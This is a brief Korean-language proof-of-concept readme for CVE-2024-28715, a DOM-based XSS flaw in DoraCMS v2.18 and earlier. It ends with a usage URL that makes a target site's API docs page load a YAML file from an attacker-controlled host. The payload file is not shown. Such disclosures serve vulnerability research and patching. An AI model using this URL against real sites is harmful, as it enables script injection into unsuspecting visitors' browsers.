
CVE-2024-28715용 개념 증명 익스플로잇. DoraCMS v2.18 및 이전 버전의 DOM 기반 XSS 취약점으로, API 문서 엔드포인트의 markdown0 함수를 통해 트리거됩니다.
[CVE ID]
CVE-2024-28715
[제품]
DoraCMS
[버전]
DoraCMS v2.18 및 이전 버전
[문제 유형]
DOM 기반 XSS.
[설명]
DOraCMS v2.18 및 이전 버전의 XSS(교차 사이트 스크립팅) 취약점으로, 원격 공격자가 /app/public/apidoc/oas3/wrap-components/markdown.jsx 엔드포인트의 markdown0 함수를 통해 임의 코드를 실행할 수 있습니다.
[사용법]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml